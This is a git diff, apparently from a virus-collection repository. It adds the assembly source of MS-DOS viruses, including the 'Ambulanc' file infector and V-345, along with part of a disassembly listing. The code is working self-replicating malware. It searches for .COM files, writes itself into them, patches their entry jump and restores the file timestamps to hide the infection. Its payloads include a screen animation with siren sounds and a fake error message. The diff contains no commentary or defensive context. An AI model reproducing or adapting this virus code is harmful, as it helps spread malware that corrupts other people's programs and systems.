t_ + LEA BX,[SI+040Fh] ;00145 8D9C0F04 ____ + INC Word Ptr [BX] ;00149 FF07 __ + LEA DX,[SI+0428h] ;0014B 8D942804 __(_ + MOV AX,3D02h ;0014F B8023D __= + INT 21h ;2-Open_Fl_Hdl ;00152 CD21 _! + MOV [SI+0417h],AX ;00154 89841704 ____ + MOV BX,[SI+0417h] ;00158 8B9C1704 ____ + MOV CX,0003h ;0015C B90300 ___ + LEA DX,[SI+0414h] ;0015F 8D941404 ____ + MOV AH,3Fh ;00163 B43F _? + INT 21h ;2-Rd_Fl_Hdl ;00165 CD21 _! + MOV AL,[SI+0414h] ;00167 8A841404 ____ + CMP AL,0E9h ;0016B 3CE9 <_ + JNZ H001AE ;0016D 753F u? + MOV DX,[SI+0415h] ;0016F 8B941504 ____ + MOV BX,[SI+0417h] ;00173 8B9C1704 ____ + ADD DX,+03h ;00177 83C203 ___ + XOR CX,CX ;0017A 33C9 3_ + MOV AX,4200h ;0017C B80042 __B + INT 21h ;2-Mov_Fl_Hdl_Ptr ;0017F CD21 _! + MOV BX,[SI+0417h] ;00181 8B9C1704 ____ + MOV CX,0006h ;00185 B90600 ___ + LEA DX,[SI+041Ch] ;00188 8D941C04 ____ + MOV AH,3Fh ;0018C B43F _? + INT 21h ;2-Rd_Fl_Hdl ;0018E CD21 _! + MOV AX,[SI+041Ch] ;00190 8B841C04 ____ + MOV BX,[SI+041Eh] ;00194 8B9C1E04 ____ + MOV CX,[SI+0420h] ;00198 8B8C2004 __ _ + CMP AX,[SI+0100h] ;0019C 3B840001 ;___ + JNZ H001AE ;001A0 750C u_ + CMP BX,[SI+0102h] ;001A2 3B9C0201 ;___ + JNZ H001AE ;001A6 7506 u_ + CMP CX,[SI+0104h] ;001A8 3B8C0401 ;___ + JZ H00212 ;001AC 7464 td +H001AE: MOV BX,[SI+0417h] ;001AE 8B9C1704 ____ + XOR CX,CX ;001B2 33C9 3_ + XOR DX,DX ;001B4 33D2 3_ + MOV AX,4202h ;001B6 B80242 __B + INT 21h ;2-Mov_Fl_Hdl_Ptr ;001B9 CD21 _! + SUB AX,0003h ;001BB 2D0300 -__ + MOV [SI+0412h],AX ;001BE 89841204 ____ + MOV BX,[SI+0417h] ;001C2 8B9C1704 ____ + MOV AX,5700h ;001C6 B80057 __W + INT 21h ;2-Fl_Hdl_Date_Time ;001C9 CD21 _! + PUSH CX ;001CB 51 Q + PUSH DX ;001CC 52 R + MOV BX,[SI+0417h] ;001CD 8B9C1704 ____ + MOV CX,0319h ;001D1 B91903 ___ + LEA DX,[SI+0100h] ;001D4 8D940001 ____ + MOV AH,40h ;001D8 B440 _@ + INT 21h ;2-Wr_Fl_Hdl ;001DA CD21 _! + MOV BX,[SI+0417h] ;001DC 8B9C1704 ____ + MOV CX,0003h ;001E0 B90300 ___ + LEA DX,[SI+0414h] ;001E3 8D941404 ____ + MOV AH,40h ;001E7 B440 _@ + INT 21h ;2-Wr_Fl_Hdl ;001E9 CD21 _! + MOV BX,[SI+0417h] ;001EB 8B9C1704 ____ + XOR CX,CX ;001EF 33C9 3_ + XOR DX,DX ;001F1 33D2 3_ + MOV AX,4200h ;001F3 B80042 __B + INT 21h ;2-Mov_Fl_Hdl_Ptr ;001F6 CD21 _! + MOV BX,[SI+0417h] ;001F8 8B9C1704 ____ + MOV CX,0003h ;001FC B90300 ___ + LEA DX,[SI+0411h] ;001FF 8D941104 ____ + MOV AH,40h ;00203 B440 _@ + INT 21h ;2-Wr_Fl_Hdl ;00205 CD21 _! + POP DX ;00207 5A Z + POP CX ;00208 59 Y + MOV BX,[SI+0417h] ;00209 8B9C1704 ____ + MOV AX,5701h ;0020D B80157 __W + INT 21h ;2-Fl_Hdl_Date_Time ;00210 CD21 _! +H00212: MOV BX,[SI+0417h] ;00212 8B9C1704 ____ + MOV AH,3Eh ;00216 B43E _> + INT 21h ;2-Close_Fl_Hdl ;00218 CD21 _! + RET ;RET_Near ;0021A C3 _ +;--------------------------------------------------- +H0021B: MOV AX,DS:[002Ch] ;0021B A12C00 _,_ + MOV ES,AX ;ES_Chg ;0021E 8EC0 __ + PUSH DS ;00220 1E _ + MOV AX,0040h ;00221 B84000 _@_ + MOV DS,AX ;DS_Chg ;00224 8ED8 __ + MOV BP,DS:[006Ch] ;00226 8B2E6C00 _.l_ + POP DS ;0022A 1F _ + TEST BP,0003h ;0022B F7C50300 ____ + JZ H00248 ;0022F 7417 t_ + XOR BX,BX ;00231 33DB 3_ + MOV AX,ES:[BX] ;ES_Ovrd ;00233 268B07 &__ + CMP AX,4150h ;00236 3D5041 =PA + JNZ H00243 ;00239 7508 u_ + CMP Word Ptr ES:[BX+02h],4854h + ;ES_Ovrd ;0023B 26817F025448 &___TH + JZ H0024E ;00241 740B t_ +H00243: INC BX ;00243 43 C + OR AX,AX ;00244 0BC0 __ + JNZ H00233 ;00246 75EB u_ +H00248: LEA DI,[SI+0428h] ;00248 8DBC2804 __(_ + JMP Short H00280 ;0024C EB32 _2 +;--------------------------------------------------- +H0024E: ADD BX,+05h ;0024E 83C305 ___ + LEA DI,[SI+0428h] ;00251 8DBC2804 __(_ + MOV AL,ES:[BX] ;ES_Ovrd ;00255 268A07 &__ + INC BX ;00258 43 C + OR AL,AL ;00259 0AC0 __ + JZ H00276 ;0025B 7419 t_ + CMP AL,3Bh ;0025D 3C3B <; + JZ H00266 ;0025F 7405 t_ + MOV [DI],AL ;00261 8805 __ + INC DI ;00263 47 G + JMP Short H00255 ;00264 EBEF __ +;--------------------------------------------------- +H00266: CMP Byte Ptr ES:[BX],00h + ;ES_Ovrd ;00266 26803F00 &_?_ + JZ H00276 ;0026A 740A t_ + SHR BP,1 ;0026C D1ED __ + SHR BP,1 ;0026E D1ED __ + TEST BP,0003h ;00270 F7C50300 ____ + JNZ H00251 ;00274 75DB u_ +H00276: CMP Byte Ptr [DI-01h],5Ch ;00276 807DFF5C _}_\ + JZ H00280 ;0027A 7404 t_ + MOV Byte Ptr [DI],5Ch ;0027C C6055C __\ + INC DI ;0027F 47 G +H00280: PUSH DS ;00280 1E _ + POP ES ;00281 07 _ + MOV [SI+0422h],DI ;00282 89BC2204 __"_ +;********* Put "*.COM" at ES:DI + MOV AX,2E2Ah ;00286 B82A2E _*. + STOSW ;00289 AB _ + MOV AX,4F43h ;0028A B8434F _CO + STOSW ;0028D AB _ + MOV AX,004Dh ;0028E B84D00 _M_ + STOSW ;00291 AB _ +;********** + PUSH ES ;00292 06 _ + MOV AH,2Fh ;00293 B42F _/ + INT 21h ;2-Get_DTA ;00295 CD21 _! + MOV AX,ES ;00297 8CC0 __ + MOV [SI+0424h],AX ;00299 89842404 __$_ + MOV [SI+0426h],BX ;0029D 899C2604 __&_ + POP ES ;002A1 07 _ + LEA DX,[SI+0478h] ;002A2 8D947804 __x_ + MOV AH,1Ah ;002A6 B41A __ + INT 21h ;1-Set_DTA ;002A8 CD21 _! + LEA DX,[SI+0428h] ;002AA 8D942804 __(_ + XOR CX,CX ;002AE 33C9 3_ + MOV AH,4Eh ;002B0 B44E _N + INT 21h ;2-Srch_1st_Fl_Hdl ;002B2 CD21 _! + JNB H002BE ;002B4 7308 s_ + XOR AX,AX ;002B6 33C0 3_ + MOV [SI+0428h],AX ;002B8 89842804 __(_ + JMP Short H002E7 ;002BC EB29 _) +;--------------------------------------------------- +H002BE: PUSH DS ;002BE 1E _ + MOV AX,0040h ;002BF B84000 _@_ + MOV DS,AX ;DS_Chg ;002C2 8ED8 __ + ROR BP,1 ;002C4 D1CD __ + XOR BP,DS:[006Ch] ;002C6 332E6C00 3.l_ + POP DS ;002CA 1F _ + TEST BP,0007h ;002CB F7C50700 ____ + JZ H002D7 ;002CF 7406 t_ + MOV AH,4Fh ;002D1 B44F _O + INT 21h ;2-Srch_Nxt_Fl_Hdl ;002D3 CD21 _! + JNB H002BE ;002D5 73E7 s_ +H002D7: MOV DI,[SI+0422h] ;002D7 8BBC2204 __"_ + LEA BX,[SI+0496h] ;002DB 8D9C9604 ____ + MOV AL,[BX] ;002DF 8A07 __ + INC BX ;002E1 43 C + STOSB ;002E2 AA _ + OR AL,AL ;002E3 0AC0 __ + JNZ H002DF ;002E5 75F8 u_ +H002E7: MOV BX,[SI+0426h] ;002E7 8B9C2604 __&_ + MOV AX,[SI+0424h] ;002EB 8B842404 __$_ + PUSH DS ;002EF 1E _ + MOV DS,AX ;DS_Chg ;002F0 8ED8 __ + MOV AH,1Ah ;002F2 B41A __ + INT 21h ;1-Set_DTA ;002F4 CD21 _! + POP DS ;002F6 1F _ + RET ;RET_Near ;002F7 C3 _ +;--------------------------------------------------- +H002F8: PUSH ES ;002F8 06 _ + MOV AX,[SI+040Fh] ;002F9 8B840F04 ____ + AND AX,0007h ;002FD 250700 %__ + CMP AX,0006h ;00300 3D0600 =__ + JNZ H0031A ;00303 7515 u_ + MOV AX,0040h ;00305 B84000 _@_ + MOV ES,AX ;ES_Chg ;00308 8EC0 __ + MOV AX,ES:[000Ch] ;ES_Ovrd ;0030A 26A10C00 &___ + OR AX,AX ;0030E 0BC0 __ + JNZ H0031A ;00310 7508 u_ + INC Word Ptr ES:[000Ch] + ;ES_Ovrd ;00312 26FF060C00 &____ + CALL H0031C ; . . . . . . . . . ;00317 E80200 ___ +H0031A: POP ES ;0031A 07 _ + RET ;RET_Near ;0031B C3 _ +;--------------------------------------------------- +H0031C: PUSH DS ;0031C 1E _ + MOV DI,0B800h ;0031D BF00B8 ___ + MOV AX,0040h ;00320 B84000 _@_ + MOV DS,AX ;DS_Chg ;00323 8ED8 __ + MOV AL,DS:[0049h] ;00325 A04900 _I_ + CMP AL,07h ;00328 3C07 <_ + JNZ H0032F ;0032A 7503 u_ + MOV DI,0B000h ;0032C BF00B0 ___ +H0032F: MOV ES,DI ;ES_Chg ;0032F 8EC7 __ + POP DS ;00331 1F _ + MOV BP,0FFF0h ;00332 BDF0FF ___ + MOV DX,0000h ;00335 BA0000 ___ + MOV CX,0010h ;00338 B91000 ___ + CALL H0037D ; . . . . . . . . . ;0033B E83F00 _?_ + INC DX ;0033E 42 B + LOOP H0033B ;0033F E2FA __ + CALL H0035A ; . . . . . . . . . ;00341 E81600 ___ + CALL H003C2 ; . . . . . . . . . ;00344 E87B00 _{_ + INC BP ;00347 45 E + CMP BP,+50h ;00348 83FD50 __P + JNZ H00335 ;0034B 75E8 u_ + CALL SILENC ; . . . . . . . . . ;0034D E80300 ___ + PUSH DS ;00350 1E _ + POP ES ;00351 07 _ + RET ;RET_Near ;00352 C3 _ +;--------------------------------------------------- +;********** Silence speaker +SILENC: IN AL,61h ;Port_IN:61h ;00353 E461 _a + AND AL,0FCh ;00355 24FC $_ + OUT 61h,AL ;Port_OUT:61h ;00357 E661 _a + RET ;RET_Near ;00359 C3 _ +;--------------------------------------------------- +H0035A: MOV DX,07D0h ;0035A BAD007 ___ + TEST BP,0004h ;0035D F7C50400 ____ + JZ H00366 ;00361 7403 t_ + MOV DX,0BB8h ;00363 BAB80B ___ +H00366: IN AL,61h ;Port_IN:61h ;00366 E461 _a + TEST AL,03h ;00368 A803 __ + JNZ H00374 ;0036A 7508 u_ + OR AL,03h ;0036C 0C03 __ + OUT 61h,AL ;Port_OUT:61h ;0036E E661 _a + MOV AL,0B6h ;00370 B0B6 __ + OUT 43h,AL ;Port_OUT:43h ;00372 E643 _C +H00374: MOV AX,DX ;00374 8BC2 __ + OUT 42h,AL ;Port_OUT:42h ;00376 E642 _B + MOV AL,AH ;00378 88E0 __ + OUT 42h,AL ;Port_OUT:42h ;0037A E642 _B + RET ;RET_Near ;0037C C3 _ +;--------------------------------------------------- +H0037D: PUSH CX ;0037D 51 Q + PUSH DX ;0037E 52 R + LEA BX,[SI+03BFh] ;0037F 8D9CBF03 ____ + ADD BX,DX ;00383 03DA __ + ADD DX,BP ;00385 01EA __ + OR DX,DX ;00387 0BD2 __ + JS H003BF ;00389 7834 x4 + CMP DX,+50h ;0038B 83FA50 __P + JNB H003BF ;0038E 732F s/ + MOV DI,0C80h ;00390 BF800C ___ + ADD DI,DX ;00393 03FA __ + ADD DI,DX ;00395 03FA __ + SUB DX,BP ;00397 29EA )_ + MOV CX,0005h ;00399 B90500 ___ + MOV AH,07h ;0039C B407 __ + MOV AL,[BX] ;0039E 8A07 __ + SUB AL,07h ;003A0 2C07 ,_ + ADD AL,CL ;003A2 02C1 __ + SUB AL,DL ;003A4 28D0 (_ + CMP CX,+05h ;003A6 83F905 ___ + JNZ H003B5 ;003A9 750A u_ + MOV AH,0Fh ;003AB B40F __ + TEST BP,0003h ;003AD F7C50300 ____ + JZ H003B5 ;003B1 7402 t_ + MOV AL,20h ;003B3 B020 _ +H003B5: STOSW ;003B5 AB _ + ADD BX,+10h ;003B6 83C310 ___ + ADD DI,009Eh ;003B9 81C79E00 ____ + LOOP H0039C ;003BD E2DD __ +H003BF: POP DX ;003BF 5A Z + POP CX ;003C0 59 Y + RET ;RET_Near ;003C1 C3 _ +;--------------------------------------------------- +H003C2: PUSH DS ;003C2 1E _ + MOV AX,0040h ;003C3 B84000 _@_ + MOV DS,AX ;DS_Chg ;003C6 8ED8 __ + MOV AX,DS:[006Ch] ;003C8 A16C00 _l_ + CMP AX,DS:[006Ch] ;003CB 3B066C00 ;_l_ + JZ H003CB ;003CF 74FA t_ + POP DS ;003D1 1F _ + RET ;RET_Near ;003D2 C3 _ +;--------------------------------------------------- + DB '"' ;003D3 22 +;--------------------------------------------------- + AND SP,[SI] ;SP_Chg ;003D4 2324 #$ + AND AX,2726h ;003D6 252627 %&' + SUB [BX+DI],CH ;003D9 2829 () + DB 66h ;Indef_OP:66h ;003DB 66 f +;--------------------------------------------------- + XCHG DI,[BP+DI] ;003DC 873B _; + SUB AX,2F2Eh ;003DE 2D2E2F -./ + XOR [BX+DI],DH ;003E1 3031 01 + AND SP,AX ;SP_Chg ;003E3 23E0 #_ + LOOPZ H003C9 ;003E5 E1E2 __ + JCXZ H003CD ;003E7 E3E4 __ + IN AX,0E6h ;Port_IN:E6h ;003E9 E5E6 __ + OUT 0E7h,AX ;Port_OUT:E7h ;003EB E7E7 __ + JMP H0EFDA ;003ED E9EAEB ___ +;--------------------------------------------------- + XOR [BX+DI],DH ;003F0 3031 01 + XOR AH,[SI] ;003F2 3224 2$ + LOOPNZ H003D7 ;003F4 E0E1 __ + LOOP H003DB ;003F6 E2E3 __ + CALL H0EE25 ; . . . . . . . . . ;003F8 E82AEA _*_ + OUT 0E8h,AX ;Port_OUT:E8h ;003FB E7E8 __ + JMP H0342F ;003FD E92F30 _/0 +;--------------------------------------------------- + DB 6Dh ;286_INSW ;00400 6D m +;--------------------------------------------------- + XOR DH,[BP+DI] ;00401 3233 23 + AND AX,0E2E1h ;00403 25E1E2 %__ + JCXZ H003EC ;00406 E3E4 __ + IN AX,0E7h ;Port_IN:E7h ;00408 E5E7 __ + OUT 0E8h,AX ;Port_OUT:E8h ;0040A E7E8 __ + JMP H0EFF9 ;0040C E9EAEB ___ +;--------------------------------------------------- + IN AL,DX ;Port_IN:DX ;0040F EC _ + IN AX,DX ;Port_IN:DX ;00410 ED _ + OUT DX,AL ;Port_OUT:DX ;00411 EE _ + OUT DX,AX ;Port_OUT:DX ;00412 EF _ + OUT 0E7h,AL ;ES_Ovrd ;00413 26E6E7 &__ + SUB [BX+DI+5Ah],BX ;00416 29595A )YZ + SUB AL,0ECh ;00419 2CEC ,_ + IN AX,DX ;Port_IN:DX ;0041B ED _ + OUT DX,AL ;Port_OUT:DX ;0041C EE _ + OUT DX,AX ;Port_OUT:DX ;0041D EF _ + DB 0F0h ;LOCK:F0h ;0041E F0 _ + XOR AH,[BP+SI+34] ;0041F 326234 2b4 +;--------------------------------------------------- + HLT ;SYSTEM_HALT ;00422 F4 _ + OR AL,[BX+SI] ;00423 0A00 __ + JMP H00439 ;00425 E91100 ___ +;--------------------------------------------------- + DB 0B4h, 09h, 0BAh ;First three bytes ;00428 + DB 05,00 ;Dunno ;0042B + DB 0B4h, 09h, 0BAh ;First three bytes ;0042D + ;AGAIN! Wierd +P00100 ENDP + +CODE ENDS + END H00100 + +;------------------------------------------------------------------------------- diff --git a/MSDOS/Virus.MSDOS.Unknown.ambulanc.asm b/MSDOS/Virus.MSDOS.Unknown.ambulanc.asm new file mode 100644 index 00000000..40eb15f7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ambulanc.asm @@ -0,0 +1,479 @@ + +PAGE 59,132 + +; +; +; AMBULANC +; +; Created: 13-Feb-92 +; Passes: 5 Analysis Options on: none +; +; + +data_1e equ 0Ch +data_2e equ 49h +data_3e equ 6Ch +psp_envirn_seg equ 2Ch +data_20e equ 0C80h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +ambulanc proc far + +start: + jmp loc_1 + db 0 +data_7 dw 0 ; Data table (indexed access) + db 44 dup (0) +loc_1: +;* call sub_1 ;* + db 0E8h, 01h, 00h + add [bp-7Fh],bx + out dx,al ; port 0, DMA-1 bas&add ch 0 + add ax,[bx+di] + call sub_2 + call sub_2 + call sub_4 + lea bx,[si+419h] ; Load effective addr + mov di,100h + mov al,[bx] + mov [di],al + mov ax,[bx+1] + mov [di+1],ax + jmp di ;*Register jump + +loc_ret_2: + retn + +ambulanc endp + +; +; SUBROUTINE +; + +sub_2 proc near + call sub_3 + mov al,byte ptr data_19[si] + or al,al ; Zero ? + jz loc_ret_2 ; Jump if zero + lea bx,[si+40Fh] ; Load effective addr + inc word ptr [bx] + lea dx,[si+428h] ; Load effective addr + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov data_12[si],ax + mov bx,data_12[si] + mov cx,3 + lea dx,[si+414h] ; Load effective addr + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov al,data_10[si] + cmp al,0E9h + jne loc_3 ; Jump if not equal + mov dx,data_11[si] + mov bx,data_12[si] + add dx,3 + xor cx,cx ; Zero register + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov bx,data_12[si] + mov cx,6 + lea dx,[si+41Ch] ; Load effective addr + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov ax,data_13[si] + mov bx,data_14[si] + mov cx,data_15[si] + cmp ax,word ptr ds:[100h][si] + jne loc_3 ; Jump if not equal + cmp bx,word ptr ds:[102h][si] + jne loc_3 ; Jump if not equal + cmp cx,data_7[si] + je loc_4 ; Jump if equal +loc_3: + mov bx,data_12[si] + xor cx,cx ; Zero register + xor dx,dx ; Zero register + mov ax,4202h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + sub ax,3 + mov data_9[si],ax + mov bx,data_12[si] + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push cx + push dx + mov bx,data_12[si] + mov cx,319h + lea dx,[si+100h] ; Load effective addr + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov bx,data_12[si] + mov cx,3 + lea dx,[si+414h] ; Load effective addr + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov bx,data_12[si] + xor cx,cx ; Zero register + xor dx,dx ; Zero register + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov bx,data_12[si] + mov cx,3 + lea dx,[si+411h] ; Load effective addr + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + pop dx + pop cx + mov bx,data_12[si] + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time +loc_4: + mov bx,data_12[si] + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + retn +sub_2 endp + + +; +; SUBROUTINE +; + +sub_3 proc near + mov ax,ds:psp_envirn_seg + mov es,ax + push ds + mov ax,40h + mov ds,ax + mov bp,ds:data_3e + pop ds + test bp,3 + jz loc_7 ; Jump if zero + xor bx,bx ; Zero register +loc_5: + mov ax,es:[bx] + cmp ax,4150h + jne loc_6 ; Jump if not equal + cmp word ptr es:[bx+2],4854h + je loc_8 ; Jump if equal +loc_6: + inc bx + or ax,ax ; Zero ? + jnz loc_5 ; Jump if not zero +loc_7: + lea di,[si+428h] ; Load effective addr + jmp short loc_13 +loc_8: + add bx,5 +loc_9: + lea di,[si+428h] ; Load effective addr +loc_10: + mov al,es:[bx] + inc bx + or al,al ; Zero ? + jz loc_12 ; Jump if zero + cmp al,3Bh ; ';' + je loc_11 ; Jump if equal + mov [di],al + inc di + jmp short loc_10 +loc_11: + cmp byte ptr es:[bx],0 + je loc_12 ; Jump if equal + shr bp,1 ; Shift w/zeros fill + shr bp,1 ; Shift w/zeros fill + test bp,3 + jnz loc_9 ; Jump if not zero +loc_12: + cmp byte ptr [di-1],5Ch ; '\' + je loc_13 ; Jump if equal + mov byte ptr [di],5Ch ; '\' + inc di +loc_13: + push ds + pop es + mov data_16[si],di + mov ax,2E2Ah + stosw ; Store ax to es:[di] + mov ax,4F43h + stosw ; Store ax to es:[di] + mov ax,4Dh + stosw ; Store ax to es:[di] + push es + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov ax,es + mov data_17[si],ax + mov data_18[si],bx + pop es + lea dx,[si+478h] ; Load effective addr + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + lea dx,[si+428h] ; Load effective addr + xor cx,cx ; Zero register + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jnc loc_14 ; Jump if carry=0 + xor ax,ax ; Zero register + mov data_19[si],ax + jmp short loc_17 +loc_14: + push ds + mov ax,40h + mov ds,ax + ror bp,1 ; Rotate + xor bp,ds:data_3e + pop ds + test bp,7 + jz loc_15 ; Jump if zero + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_14 ; Jump if carry=0 +loc_15: + mov di,data_16[si] + lea bx,[si+496h] ; Load effective addr +loc_16: + mov al,[bx] + inc bx + stosb ; Store al to es:[di] + or al,al ; Zero ? + jnz loc_16 ; Jump if not zero +loc_17: + mov bx,data_18[si] + mov ax,data_17[si] + push ds + mov ds,ax + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + pop ds + retn +sub_3 endp + + +; +; SUBROUTINE +; + +sub_4 proc near + push es + mov ax,data_8[si] + and ax,7 + cmp ax,6 + jne loc_18 ; Jump if not equal + mov ax,40h + mov es,ax + mov ax,es:data_1e + or ax,ax ; Zero ? + jnz loc_18 ; Jump if not zero + inc word ptr es:data_1e + call sub_5 +loc_18: + pop es + retn +sub_4 endp + + +; +; SUBROUTINE +; + +sub_5 proc near + push ds + mov di,0B800h + mov ax,40h + mov ds,ax + mov al,ds:data_2e + cmp al,7 + jne loc_19 ; Jump if not equal + mov di,0B000h +loc_19: + mov es,di + pop ds + mov bp,0FFF0h +loc_20: + mov dx,0 + mov cx,10h + +locloop_21: + call sub_8 + inc dx + loop locloop_21 ; Loop if cx > 0 + + call sub_7 + call sub_9 + inc bp + cmp bp,50h + jne loc_20 ; Jump if not equal + call sub_6 + push ds + pop es + retn +sub_5 endp + + +; +; SUBROUTINE +; + +sub_6 proc near + in al,61h ; port 61h, 8255 port B, read + and al,0FCh + out 61h,al ; port 61h, 8255 B - spkr, etc + ; al = 0, disable parity + retn +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + mov dx,7D0h + test bp,4 + jz loc_22 ; Jump if zero + mov dx,0BB8h +loc_22: + in al,61h ; port 61h, 8255 port B, read + test al,3 + jnz loc_23 ; Jump if not zero + or al,3 + out 61h,al ; port 61h, 8255 B - spkr, etc + mov al,0B6h + out 43h,al ; port 43h, 8253 wrt timr mode +loc_23: + mov ax,dx + out 42h,al ; port 42h, 8253 timer 2 spkr + mov al,ah + out 42h,al ; port 42h, 8253 timer 2 spkr + retn +sub_7 endp + + +; +; SUBROUTINE +; + +sub_8 proc near + push cx + push dx + lea bx,[si+3BFh] ; Load effective addr + add bx,dx + add dx,bp + or dx,dx ; Zero ? + js loc_26 ; Jump if sign=1 + cmp dx,50h + jae loc_26 ; Jump if above or = + mov di,data_20e + add di,dx + add di,dx + sub dx,bp + mov cx,5 + +locloop_24: + mov ah,7 + mov al,[bx] + sub al,7 + add al,cl + sub al,dl + cmp cx,5 + jne loc_25 ; Jump if not equal + mov ah,0Fh + test bp,3 + jz loc_25 ; Jump if zero + mov al,20h ; ' ' +loc_25: + stosw ; Store ax to es:[di] + add bx,10h + add di,9Eh + loop locloop_24 ; Loop if cx > 0 + +loc_26: + pop dx + pop cx + retn +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near + push ds + mov ax,40h + mov ds,ax + mov ax,ds:data_3e +loc_28: + cmp ax,ds:data_3e + je loc_28 ; Jump if equal + pop ds + retn +sub_9 endp + + and ah,[bp+di] + and al,25h ; '%' + db 26h, 27h, 28h, 29h, 66h, 87h + db 3Bh, 2Dh, 2Eh, 2Fh, 30h, 31h + db 23h,0E0h,0E1h,0E2h,0E3h,0E4h + db 0E5h,0E6h,0E7h,0E7h,0E9h,0EAh + db 0EBh + db 30h +data_8 dw 3231h ; Data table (indexed access) + db 24h +data_9 dw 0E1E0h ; Data table (indexed access) +data_10 db 0E2h ; Data table (indexed access) +data_11 dw 0E8E3h ; Data table (indexed access) +data_12 dw 0EA2Ah ; Data table (indexed access) + db 0E7h,0E8h,0E9h +data_13 dw 302Fh ; Data table (indexed access) +data_14 dw 326Dh ; Data table (indexed access) +data_15 dw 2533h ; Data table (indexed access) +data_16 dw 0E2E1h ; Data table (indexed access) +data_17 dw 0E4E3h ; Data table (indexed access) +data_18 dw 0E7E5h ; Data table (indexed access) +data_19 dw 0E8E7h ; Data table (indexed access) + db 0E9h,0EAh,0EBh,0ECh,0EDh,0EEh + db 0EFh, 26h,0E6h,0E7h, 29h, 59h + db 5Ah, 2Ch,0ECh,0EDh,0EEh,0EFh + db 0F0h, 32h, 62h, 34h,0F4h, 0Ah + db 00h,0E9h, 2Fh, 00h,0CDh, 20h + db 00h, 05h, 00h,0CDh, 20h, 00h + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.amst-299.asm b/MSDOS/Virus.MSDOS.Unknown.amst-299.asm new file mode 100644 index 00000000..cb44f781 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.amst-299.asm @@ -0,0 +1,133 @@ + page ,132 + name V345 + title V-345 - a mutation of the V-845 virus + .radix 16 +code segment + assume cs:code,ds:code + org 100 + +timer equ 6C +dta equ 80 +ftime equ offset dta + 16 +fdate equ offset dta + 18 +fname equ offset dta + 1E +virlen = offset endcode - offset start +newid = offset ident - offset start + +start: + jmp short virus + +ident dw 'VI' +counter db 0 +allcom db '*.COM',0 +progbeg dd ? +eof dw ? + +virus: + push ax + mov ax,cs ;Move program code + add ax,1000 ; 64K bytes forward + mov es,ax + inc [counter] + mov si,offset start + xor di,di + mov cx,virlen + rep movsb + + mov dx,offset allcom ;Search for '*.COM' files + mov cx,110b ;Normal, Hidden or System + mov ah,4E ;Find First file + int 21 + jc done ;Quit if none found + +mainlp: + mov dx,fname + mov ax,3D02 ;Open file in Read/Write mode + int 21 + mov bx,ax ; Save handle + push es + pop ds + mov dx,virlen + mov cx,0FFFF ;Read all bytes (64K max in .COM file) + mov ah,3F ;Read from handle + int 21 ;Bytes read in AX + add ax,virlen + mov cs:[eof],ax ;Save pointer to the end of file + cmp ds:[newid+virlen],'VI' ;Infected? + je close ;Go find next file if so + + xor cx,cx ;Go to file beginning + mov dx,cx + mov ax,4200 ;LSEEK from the beginning of the file + int 21 + jc close ;Leave this file if error occures + + xor dx,dx ;Write the whole code (virus+file) + mov cx,cs:[eof] ; back onto the file + mov ah,40 ;Write to handle + int 21 + + mov cx,cs:[ftime] + mov dx,cs:[fdate] + mov ax,5701 ;Set file date/time + int 21 + +close: + mov ah,3E ;Close the file + int 21 + + push cs + pop ds ;Restore DS + mov ah,4F ;Find next matching file + int 21 + jc done ;Exit if all found + jmp mainlp ;Otherwise loop again + +done: + cmp [counter],5 ;If counter goes above 5, + jb progok ; the program becomes "sick" + mov ax,40 + mov ds,ax ;Get the system timer value + mov ax,word ptr ds:[timer] + push cs + pop ds ;Restore DS + and ax,1 ;At random (if timer value is odd) + jz progok ; display the funny message + mov dx,offset message + mov ah,9 ;Print string + int 21 + int 20 ;Terminate program + +message db 'Program sick error:Call doctor or ' + db 'buy PIXEL for cure description',0A,0Dh,'$' + +progok: + mov si,offset transf ;Move this part of code + mov cx,offset endcode - offset transf ;Code length + xor di,di ;Move to ES:0 + rep movsb ;Do it + + pop bx ; BX = old AX + mov word ptr cs:[progbeg],0 + mov word ptr cs:[progbeg+2],es ;Point progbeg at program start + jmp cs:[progbeg] ;Jump at program start + +transf: + push ds + pop es + mov si,offset endcode + mov di,offset start + mov cx,0FFFF ;Restore original program's code + sub cx,si + rep movsb + mov word ptr cs:[start],offset start + mov word ptr cs:[start+2],ds + mov ax,bx + jmp dword ptr cs:[start] ;Jump to program start +endcode label byte + + int 20 ;Dummy program + +code ends + end start + \ No newline at end of file diff --git 